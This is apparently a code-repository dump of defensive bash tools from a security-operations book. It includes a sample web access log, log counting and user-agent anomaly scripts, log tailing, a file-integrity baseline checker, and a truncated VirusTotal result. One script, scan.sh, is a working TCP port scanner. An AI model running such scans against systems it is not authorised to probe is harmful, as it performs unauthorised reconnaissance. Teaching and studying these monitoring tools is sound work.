192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/contact.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/contact.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1" 200 5011 "http://192.168.0.35/contact.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /request-quote.html HTTP/1.1" 200 7326 "http://192.168.0.35/contact.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] "GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1" 200 1385 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:46 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
================================================
FILE: ch07/countem.awk
================================================
# Cybersecurity Ops with bash
# countem.awk
#
# Description:
# Count the number of instances of an item using awk
#
# Usage:
# countem.awk < inputfile
#
# Tally how often each distinct first field occurs on stdin, then print one
# "<count> <item>" line per item. The order of an awk for-in loop is
# unspecified, so pipe the result through sort when a stable order matters.
awk '
  # every input record bumps the counter keyed by its first field
  { seen[$1] += 1 }

  END {
    for (item in seen)
      printf "%d %s\n", seen[item], item
  }
'
================================================
FILE: ch07/countem.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# countem.sh
#
# Description:
# Count the number of instances of an item using bash
#
# Usage:
# countem.sh < inputfile
#
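# Count how many times each distinct first field appears on stdin and print
# "<item> <count>" per item (associative-array order is unspecified).
declare -A cnt                      # item -> number of occurrences

# -r keeps backslashes in the data literal; everything after the first
# field lands in xtra and is ignored.
while read -r id xtra
do
  # an empty key is not a valid associative-array subscript
  [[ -n $id ]] || continue
  # Fields taken from logs are untrusted. `let cnt[$id]++` hands the
  # expanded key to the arithmetic evaluator, which expands the subscript
  # a second time; a plain assignment with a quoted subscript keeps the
  # key as data.
  prev=${cnt["$id"]:-0}
  cnt["$id"]=$(( prev + 1 ))
done

# now display what we counted, one line per key of the assoc. array
for id in "${!cnt[@]}"
do
  printf '%s %d\n' "$id" "${cnt[$id]}"
done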
================================================
FILE: ch07/histogram.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# histogram.sh
#
# Description:
# Generate a horizontal bar chart of specified data
#
# Usage: ./histogram.sh
# input format: label value
#
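#######################################
# Print one bar of '#' characters, scaled so that maxraw maps to MAXBAR.
# Globals:   MAXBAR (read) - width of the longest bar
# Arguments: $1 - value to draw
#            $2 - largest value in the data set
# Outputs:   the bar followed by a newline on stdout
# Note:      the locals carry the integer attribute, so both arguments are
#            evaluated arithmetically; callers should pass plain integers.
#######################################
function pr_bar ()
{
  local -i i raw maxraw scaled
  raw=$1
  maxraw=$2
  scaled=0
  # maxraw is 0 when every value is 0 or no data was read; skip the
  # division instead of letting the shell report "division by 0"
  if (( maxraw != 0 ))
  then
    (( scaled = (MAXBAR * raw) / maxraw ))
  fi
  # min size guarantee: a non-zero value always gets at least one '#'
  if (( raw > 0 && scaled == 0 ))
  then
    scaled=1
  fi
  for (( i = 0; i < scaled; i++ ))
  do
    printf '#'
  done
  printf '\n'
} # pr_bar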
#
# "main"
#
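declare -A RA                       # label -> value
declare -i MAXBAR max
max=0
MAXBAR=50 # how large the largest bar should be

# Read "label value" pairs from stdin.
while read -r labl val
do
  # Only plain non-negative integers are charted. The original
  # `let RA[$labl]=$val` passed both fields to the arithmetic evaluator,
  # which treats input text as an expression; validating the value and
  # assigning with a quoted subscript keeps the input as data.
  [[ -n $labl && $val =~ ^[0-9]+$ ]] || continue
  val=$(( 10#$val ))                # base 10 even with leading zeros
  RA["$labl"]=$val
  # keep the largest value; for scaling
  (( val > max )) && max=$val
done

# scale and print it, one bar per label
for labl in "${!RA[@]}"
do
  printf '%-20.20s ' "$labl"
  pr_bar "${RA[$labl]}" "$max"
done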
================================================
FILE: ch07/histogram_plain.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# histogram_plain.sh
#
# Description:
# Generate a horizontal bar chart of specified data without
# using associative arrays, good for older versions of bash
#
# Usage: ./histogram_plain.sh
# input format: label value
#
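# NOTE(review): pr_bar is called below but is not defined in this file. A
# definition that reads the lower-case `maxbar` set here (the pr_bar in
# ch08/livebar.sh does) has to be in scope before the output loop runs.

# Parallel indexed arrays: RA_key[n] is the label for RA_value[n]. The
# declaration now names the array the loop actually fills.
declare -a RA_key RA_value
declare -i max ndx
max=0
maxbar=50 # how large the largest bar should be
ndx=0

# Read "label value" pairs from stdin.
while read -r labl val
do
  # chart only plain non-negative integers; the value is used in
  # arithmetic below, where arbitrary text would be evaluated as an
  # expression
  [[ -n $labl && $val =~ ^[0-9]+$ ]] || continue
  val=$(( 10#$val ))                # base 10 even with leading zeros
  RA_key[ndx]=$labl
  RA_value[ndx]=$val
  # keep the largest value; for scaling
  (( val > max )) && max=$val
  ndx=$(( ndx + 1 ))
done

# scale and print it
for (( j = 0; j < ndx; j++ ))
do
  # quoted so a label containing glob characters is printed as is
  printf "%-20.20s " "${RA_key[j]}"
  pr_bar "${RA_value[j]}" "$max"
done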
================================================
FILE: ch07/pagereq.awk
================================================
# Cybersecurity Ops with bash
# pagereq.awk
#
# Description:
# Count the number of page requests for a given IP address using awk
#
# Usage:
# pagereq <ip address> < inputfile
# <ip address> IP address to search for
#
# count the number of page requests from an address ($1)
# The awk variable is called "page" but holds the client address given as
# the script argument; it is compared with field 1 of each log line, and
# field 7 (the requested path in the access-log lines used here) is counted.
awk -v page="$1" '
  $1 == page { hits[$7]++ }

  END {
    for (path in hits)
      printf "%8d %s\n", hits[path], path
  }
'
================================================
FILE: ch07/pagereq.sh
================================================
# Cybersecurity Ops with bash
# pagereq.sh
#
# Description:
# Count the number of page requests for a given IP address using bash
#
# Usage:
# pagereq <ip address> < inputfile
# <ip address> IP address to search for
#
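# Count, per requested page, the log lines whose client address equals $1.
declare -A cnt                      # requested page -> hit count

# Field layout of the access log: address, two placeholders, timestamp,
# GMT offset, request method, page, then the rest of the line.
while read -r addr d1 d2 datim gmtoff getr page therest
do
  # quoted right-hand side: compare as a literal string, not as a pattern
  [[ $addr == "$1" ]] || continue
  [[ -n $page ]] || continue
  # The request path is chosen by the client. `let cnt[$page]+=1` would
  # pass it to the arithmetic evaluator, which expands the subscript a
  # second time; a plain assignment with a quoted subscript keeps the
  # path as data.
  prev=${cnt["$page"]:-0}
  cnt["$page"]=$(( prev + 1 ))
done

# Quoted expansions: paths contain characters such as ? and * that the
# shell would otherwise treat as glob patterns.
for id in "${!cnt[@]}"
do
  printf "%8d %s\n" "${cnt[$id]}" "$id"
done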
================================================
FILE: ch07/summer.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# summer.sh
#
# Description:
# Sum the total of field 2 values for each unique field 1
#
# Usage: ./summer.sh
# input format: <name> <number>
#
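# Sum the second field per distinct first field read from stdin.
declare -A cnt                      # name -> running total

while read -r id count
do
  # Accept only an optionally signed decimal integer. The original
  # `let cnt[$id]+=$count` evaluated both fields as arithmetic text, so
  # anything in the input was treated as an expression. Leading zeros are
  # stripped so the number is not read as octal.
  [[ -n $id && $count =~ ^(-?)0*([0-9]+)$ ]] || continue
  prev=${cnt["$id"]:-0}
  cnt["$id"]=$(( prev + ${BASH_REMATCH[1]}${BASH_REMATCH[2]} ))
done

for id in "${!cnt[@]}"
do
  printf "%-15s %8d\n" "${id}" "${cnt[${id}]}"
done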
================================================
FILE: ch07/useragents.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# useragents.sh
#
# Description:
# Read through a log looking for unknown user agents
#
# Usage: ./useragents.sh < <inputfile>
# <inputfile> Apache access log
#
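# mismatch - search through the array of known names
# Globals:   KNOWN (read)  - array of known user-agent names
#            KNSIZE (read) - number of entries in KNOWN
# Arguments: $1 - user-agent string to check
# returns 1 (false) if it finds a match
# returns 0 (true) if there is no match
function mismatch ()
{
  local -i i
  local known
  for (( i = 0; i < KNSIZE; i++ ))
  do
    known=${KNOWN[i]}
    # A blank line in the known list would match every user agent and
    # silently switch the check off, so empty entries are skipped.
    [[ -n $known ]] || continue
    # The entry is quoted, so it is matched as a literal substring;
    # characters such as . ( ) in a name are not regex operators.
    [[ $1 == *"$known"* ]] && return 1
  done
  return 0
}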
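# read up the known ones; without the list every request would be
# reported, so a missing or unreadable file is treated as fatal
readarray -t KNOWN < "useragents.txt" || {
  echo "useragents.sh: cannot read useragents.txt" >&2
  exit 1
}
KNSIZE=${#KNOWN[@]}

# The User-Agent header is supplied by the client. A match only says the
# string contains a known name, so use the output to spot unusual tools,
# not as proof that a listed browser made the request.

# preprocess logfile (stdin) to pick out ipaddr and user agent:
# splitting on '"' leaves the address and timestamp in $1 and the agent in $6
awk -F'"' '{print $1, $6}' | \
while read -r ipaddr dash1 dash2 dtstamp delta useragent
do
  if mismatch "$useragent"
  then
    # -r above and '%s' here keep backslashes in the logged agent intact
    printf 'anomaly: %s %s\n' "$ipaddr" "$useragent"
  fi
done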
================================================
FILE: ch07/useragents.txt
================================================
Firefox
Chrome
Safari
Edge
================================================
FILE: ch08/livebar.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# livebar.sh
#
# Description:
# Creates a rolling horizontal bar chart of live data
#
# Usage:
# <output from other script or program> | bash livebar.sh
#
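#######################################
# Print one bar of '#' characters, scaled so that maxraw maps to maxbar.
# Globals:   maxbar (read) - largest number of characters in a bar
# Arguments: $1 - value to draw
#            $2 - value that corresponds to a full-width bar; must be
#                 non-zero (the caller starts it at 60 and only raises it)
# Outputs:   the bar followed by a newline on stdout
#######################################
function pr_bar ()
{
  # i is local too, so the loop counter no longer leaks into the caller
  local raw maxraw scaled i
  raw=$1
  maxraw=$2
  (( scaled = (maxbar * raw) / maxraw ))
  (( scaled == 0 )) && scaled=1 # min size guarantee
  for (( i = 0; i < scaled; i++ ))
  do
    printf '#'
  done
  printf '\n'
} # pr_bar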
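maxbar=60 # largest no. of chars in a bar
MAX=60    # value drawn as a full-width bar; grows when exceeded

# Each input line: day stamp, time stamp, quantity.
while read -r dayst timst qty
do
  # The quantity comes from another program and is used in arithmetic,
  # where arbitrary text would be evaluated as an expression; accept only
  # plain non-negative integers.
  [[ $qty =~ ^[0-9]+$ ]] || continue
  qty=$(( 10#$qty ))                # base 10 even with leading zeros
  if (( qty > MAX ))
  then
    MAX=$(( qty + qty / 4 )) # allow some room
    echo " **** rescaling: MAX=$MAX"
  fi
  printf '%6.6s %6.6s %4d:' "$dayst" "$timst" "$qty"
  pr_bar "$qty" "$MAX"
done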
================================================
FILE: ch08/looper.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# looper.sh
#
# Description:
# Count the lines in a file being tailed -f
# Report the count interval on every SIGUSR1
#
# Usage: ./looper.sh [filename]
# filename of file to be tailed, default: log.file
#
# interval - print a "yymmdd HHMMSS <count>" line for the lines counted
# since the last report, then restart the count. Reads and resets the
# global cnt.
function interval ()
{
  local stamp
  stamp=$(date '+%y%m%d %H%M%S')
  echo "$stamp" $cnt
  cnt=0
}
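declare -i cnt=0
# report and reset the count whenever SIGUSR1 arrives
trap interval SIGUSR1
# lastpipe runs the final pipeline stage in this shell, so the loop below
# and the trap handler update the same cnt
shopt -s lastpipe
# --pid makes tail exit once this script is gone. The file name is quoted
# and preceded by -- so spaces or a leading dash cannot change the command.
tail -f --pid=$$ -- "${1:-log.file}" | while read -r aline
do
  cnt=$(( cnt + 1 ))
done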
================================================
FILE: ch08/tailcount.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# tailcount.sh
#
# Description:
# Count lines every n seconds
#
# Usage: ./tailcount.sh [filename]
# filename: passed to looper.sh
#
# cleanup - on exit, stop the background process whose PID is in LOPID
function cleanup ()
{
  # no PID recorded: nothing to stop (status 1, as a failed test would give)
  [[ -z $LOPID ]] && return 1
  kill $LOPID
}
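trap cleanup EXIT
# pass the file name on only when one was given, as a single word
bash looper.sh ${1:+"$1"} &
LOPID=$!
# give it a chance to start up
sleep 3
while true
do
  # Stop once the counter is gone: after it exits its PID can be reused,
  # and the signal would then reach an unrelated process. Clearing LOPID
  # keeps cleanup from signalling that PID as well.
  kill -SIGUSR1 "$LOPID" || { LOPID=; break; }
  sleep 5
done >&2 # anything the loop prints goes to stderr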
================================================
FILE: ch08/wintail.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# wintail.sh
#
# Description:
# Perform a tail-like function on a Windows log
#
# Usage: ./wintail.sh
#
# Name of the Windows event log to follow.
WINLOG="Application"

# Each query asks wevtutil for one event (c:1), newest first (rd:true), as
# text. The switches are written with doubled slashes - presumably so the
# bash-on-Windows environment does not rewrite them as paths; confirm.
LASTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text)

# NOTE(review): only the newest event is compared on each pass, so when
# several events arrive between two queries the earlier ones are never
# printed. The loop also polls without a pause.
until false
do
  CURRENTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text)
  # unchanged newest event: nothing to report yet
  [[ "$CURRENTLOG" == "$LASTLOG" ]] && continue
  echo "$CURRENTLOG"
  echo "----------------------------------"
  LASTLOG="$CURRENTLOG"
done
================================================
FILE: ch09/autoscan.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# autoscan.sh
#
# Description:
# Automatically performs a port scan (using scan.sh),
# compares output to previous results, and emails user
# Assumes that scan.sh is in the current directory.
#
# Usage: ./autoscan.sh
#
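# Run today's scan; scan.sh writes to scan_<date> when given no file name.
./scan.sh < hostlist || {
  echo "autoscan.sh: scan failed (is hostlist present?)" >&2
  exit 1
}

# Take the two newest result files from the glob instead of parsing ls
# output. The scan_YYYY-MM-DD names sort in date order.
shopt -s nullglob
FILES=( scan_* )
shopt -u nullglob
if (( ${#FILES[@]} < 2 ))
then
  # first run: there is no earlier scan to compare against
  echo "autoscan.sh: need two scan_* files to compare, found ${#FILES[@]}" >&2
  exit 0
fi
FILES=( "${FILES[@]: -2}" )

# mktemp replaces the deprecated tempfile; the trap removes the file on
# every exit path, not only after a clean run
TMPFILE=$(mktemp) || exit 1
trap 'rm -f -- "$TMPFILE"' EXIT

./fd2.sh "${FILES[0]}" "${FILES[1]}" > "$TMPFILE"
if [[ -s $TMPFILE ]] # non-empty: something changed
then
  echo "mailing today's port differences to $USER"
  mail -s "today's port differences" "$USER" < "$TMPFILE"
fi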
================================================
FILE: ch09/fd2.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# fd2.sh
#
# Description:
# Compares two port scans to find changes
# MAJOR ASSUMPTION: both files have the same # of lines,
# each line with the same host address
# though with possibly different listed ports
#
# Usage: ./fd2.sh <file1> <file2>
#
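# look for "$LOOKFOR" in the list of args to this function
# Globals:   LOOKFOR (read) - the value to search for
# Arguments: the list to search
# returns true (0) if it is not in the list, false (1) if it is
function NotInList ()
{
  local port
  for port in "$@"
  do
    # quoted: LOOKFOR is compared literally, not used as a glob pattern
    [[ $port == "$LOOKFOR" ]] && return 1
  done
  return 0
}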
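# Walk both scan files in step: descriptor 4 is the older file, 5 the newer.
while true
do
  read -r aline <&4 || break # at EOF
  read -r bline <&5 || break # at EOF, for symmetry
  # identical lines mean nothing changed for this host; the right-hand
  # side is quoted so the comparison is literal
  [[ $aline == "$bline" ]] && continue

  # There is a difference, so subdivide each line into host and ports.
  # Reading the fields this way leaves the port list empty for a host
  # with no open ports instead of treating the host name as a port, and
  # it does not glob-expand the data.
  read -r HOSTA RESTA <<< "$aline"
  read -r -a PORTSA <<< "$RESTA"
  read -r HOSTB RESTB <<< "$bline"
  read -r -a PORTSB <<< "$RESTB"

  # The comparison assumes both files list the same hosts in the same
  # order; say so when that does not hold, because the port differences
  # printed below are then not meaningful.
  if [[ $HOSTA != "$HOSTB" ]]
  then
    echo "fd2.sh: host mismatch: '$HOSTA' vs '$HOSTB'" >&2
  fi

  printf '%s\n' "$HOSTA" # identify the host which changed
  for porta in "${PORTSA[@]}"
  do
    LOOKFOR=$porta NotInList "${PORTSB[@]}" && echo " closed: $porta"
  done
  for portb in "${PORTSB[@]}"
  do
    LOOKFOR=$portb NotInList "${PORTSA[@]}" && echo " new: $portb"
  done
done 4< "${1:-day1.data}" 5< "${2:-day2.data}"
# day1.data and day2.data are default names to make it easier to test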
================================================
FILE: ch09/scan.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# scan.sh
#
# Description:
# Perform a port scan (TCP ports 1-1023) of each host named on stdin
#
# Usage: ./scan.sh [output file] < hostlist
# [output file] File to save results in (default: scan_<today's date>)
#
# scan - try a TCP connection to ports 1 through 1023 of the given host and
# print one line: the host followed by every port that accepted.
# Arguments: $1 - host name or address
# Note: host and port are not declared local, so both remain set in the
#       calling shell afterwards.
function scan ()
{
  host=$1
  printf '%s' "$host"
  port=1
  while (( port < 1024 ))
  do
    # Opening /dev/tcp/<host>/<port> makes bash attempt the connection.
    # The output redirects come first, so stderr is already discarded when
    # a failed connection is reported; the command status is the result.
    if echo >/dev/null 2>&1 < /dev/tcp/${host}/${port}
    then
      printf ' %d' "${port}"
    fi
    (( port++ ))
  done
  echo # or printf '\n'
}
#
# main loop
# read in each host name (from stdin)
# and scan for open ports
# save the results in a file
# whose name is supplied as an argument
# or default to one based on today's date
#
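printf -v TODAY 'scan_%(%F)T' -1 # e.g., scan_2017-11-27
OUTFILE=${1:-$TODAY}

# The loop variable is no longer HOSTNAME, which is a variable bash itself
# maintains for the local machine.
while read -r target
do
  [[ -n $target ]] || continue
  # scan places the name inside a /dev/tcp path, so accept only characters
  # that occur in host names and addresses
  if [[ ! $target =~ ^[A-Za-z0-9._:-]+$ ]]
  then
    printf 'scan.sh: skipping invalid host entry: %s\n' "$target" >&2
    continue
  fi
  scan "$target"
done > "$OUTFILE" # quoted: a file name with spaces still works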
================================================
FILE: ch10/baseline.sh
================================================
#!/bin/bash
# baseline.sh - compare baselines
# and report on differences
#
# usageErr - print the usage summary and exit with status 2.
# The redirection attached to the function body sends everything it
# prints to stderr.
function usageErr ()
{
  printf '%s\n' \
    'usage: baseline.sh [-d path] file1 [file2]' \
    'creates or compares a baseline from path' \
    'default for path is /'
  exit 2
} >&2
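# dosumming - print a "hash  path" line (sha1sum format) for every regular
# file below the directories in DIR.
# Globals: DIR (read) - array of starting directories
function dosumming ()
{
  # find runs sha1sum itself: a path containing a newline stays one
  # argument, and nothing is run when no file is found (xargs would run
  # sha1sum once on empty input and record a bogus "-" entry).
  # NOTE(review): SHA-1 no longer resists deliberate collisions; sha256sum
  # is the stronger choice for tamper detection, but switching would not
  # match baselines already recorded, so the hash is left unchanged.
  find "${DIR[@]}" -type f -exec sha1sum {} +
}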
# ===============================
# MAIN
# ===============================
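# xmlEscape - escape the characters that are special in XML text and in
# double-quoted attribute values. The result is left in XMLOUT, so no
# subshell is needed per file. File names are chosen by whoever can write
# to the scanned tree; unescaped they could break or add elements to the
# report.
function xmlEscape ()
{
  XMLOUT=$1
  XMLOUT=${XMLOUT//&/\&amp;}
  XMLOUT=${XMLOUT//</\&lt;}
  XMLOUT=${XMLOUT//>/\&gt;}
  XMLOUT=${XMLOUT//\"/\&quot;}
}

declare -a DIR
# ---------- parse the arguments
while getopts "d:" MYOPT
do
  case "$MYOPT" in
    d) DIR+=( "$OPTARG" ) ;;
    # unknown option, or -d without a path: do not add an empty directory
    *) usageErr ;;
  esac
done
shift $((OPTIND-1))
# no arguments? too many?
(( $# == 0 || $# > 2 )) && usageErr
(( ${#DIR[*]} == 0 )) && DIR=( "/" )
# create either a baseline (only 1 filename provided)
# or a secondary summary (when two filenames are provided)
BASE="$1"
B2ND="$2"
if (( $# == 1 )) # only 1 arg.
then
  # creating "$BASE"
  dosumming > "$BASE"
  # all done for baseline
  exit
fi
if [[ ! -r "$BASE" ]]
then
  usageErr
fi
# --------- on to the actual work:
# if 2nd file exists just compare the two
# else create/fill it
if [[ ! -e "$B2ND" ]]
then
  # progress message goes to stderr so stdout carries only the XML report
  echo creating "$B2ND" >&2
  dosumming > "$B2ND"
fi
# now we have: 2 files created by sha1sum
declare -A BYPATH BYHASH INUSE # assoc. arrays
# load up the first file as the baseline
# NOTE(review): sha1sum escapes names that contain a backslash or newline;
# those entries are not decoded here - verify before relying on them.
while read HNUM FN
do
  # a blank or hash-only line cannot be used as an array key
  [[ -n $HNUM && -n $FN ]] || continue
  BYPATH["$FN"]=$HNUM
  BYHASH[$HNUM]="$FN"   # files with identical content: the last path wins
  INUSE["$FN"]="X"      # X = not yet seen in the second file
done < "$BASE"
# ------ now begin the output
# see if each filename listed in the 2nd file is in
# the same place (path) as in the 1st (the baseline)
xmlEscape "$HOSTNAME"; XHOST=$XMLOUT
xmlEscape "${DIR[*]}"; XDIR=$XMLOUT
printf '<filesystem host="%s" dir="%s">\n' "$XHOST" "$XDIR"
while read HNUM FN
do
  [[ -n $HNUM && -n $FN ]] || continue
  xmlEscape "$FN"; XFN=$XMLOUT
  WASHASH="${BYPATH[${FN}]}"
  # did it find one? if not, it will be null
  if [[ -z $WASHASH ]]
  then
    ALTFN="${BYHASH[$HNUM]}"
    if [[ -z $ALTFN ]]
    then
      printf ' <new>%s</new>\n' "$XFN"
    else
      xmlEscape "$ALTFN"
      printf ' <relocated orig="%s">%s</relocated>\n' "$XMLOUT" "$XFN"
      INUSE["$ALTFN"]='_' # mark this as seen
    fi
  else
    INUSE["$FN"]='_' # mark this as seen
    # quoted: compare the two hashes as literal strings
    if [[ $HNUM == "$WASHASH" ]]
    then
      continue; # nothing changed;
    else
      printf ' <changed>%s</changed>\n' "$XFN"
    fi
  fi
done < "$B2ND"
# whatever is still marked X was in the baseline but not in the 2nd file
for FN in "${!INUSE[@]}"
do
  if [[ "${INUSE[$FN]}" == 'X' ]]
  then
    xmlEscape "$FN"
    printf ' <removed>%s</removed>\n' "$XMLOUT"
  fi
done
printf '</filesystem>\n'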
================================================
FILE: ch11/Calc_VT.txt
================================================
{"scans": {"Bkav": {"detected": false, "version": "1.3.0.9466", "result": null, "update": "20180712"}, "MicroWorld-eScan": {"detected": false, "version": "14.0.297.0", "result": null, "update": "20180712"}, "VBA32": {"detected": false, "version": "3.12.32.0", "result": null, "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": false, "version": "14.00", "result": null, "update": "20180712"}, "McAfee": {"detected": false, "version": "6.0.6.653", "result": null, "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "AegisLab": {"detected": false, "version": "4.2", "result": null, "update": "20180712"}, "CrowdStrike": {"detected": false, "version": "1.0", "result": null, "update": "20180530"}, "K7GW": {"detected": false, "version": "10.53.27735", "result": null, "update": "20180712"}, "K7AntiVirus": {"detected": false, "version": "10.53.27740", "result": null, "update": "20180712"}, "TheHacker": {"detected": false, "version": "6.8.0.5.3314", "result": null, "update": "20180712"}, "TrendMicro": {"detected": false, "version": "10.0.0.1040", "result": null, "update": "20180712"}, "Baidu": {"detected": false, "version": "1.0.0.2", "result": null, "update": "20180712"}, "NANO-Antivirus": {"detected": false, "version": "1.0.116.23366", "result": null, "update": "20180712"}, "F-Prot": {"detected": false, "version": "4.7.1.166", "result": null, "update": "20180712"}, "Symantec": {"detected": false, "version": "1.6.0.0", "result": null, "update": "20180712"}, "ESET-NOD32": {"detected": false, "version": "17703", "result": null, "update": "20180712"}, "TrendMicro-HouseCall": {"detected": false, "version": "9.950.0.1006", "result": null, "update": "20180712"}, "Paloalto": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "ClamAV": {"detected": false, "version": "0.100.1.0", "result": null, "update": 
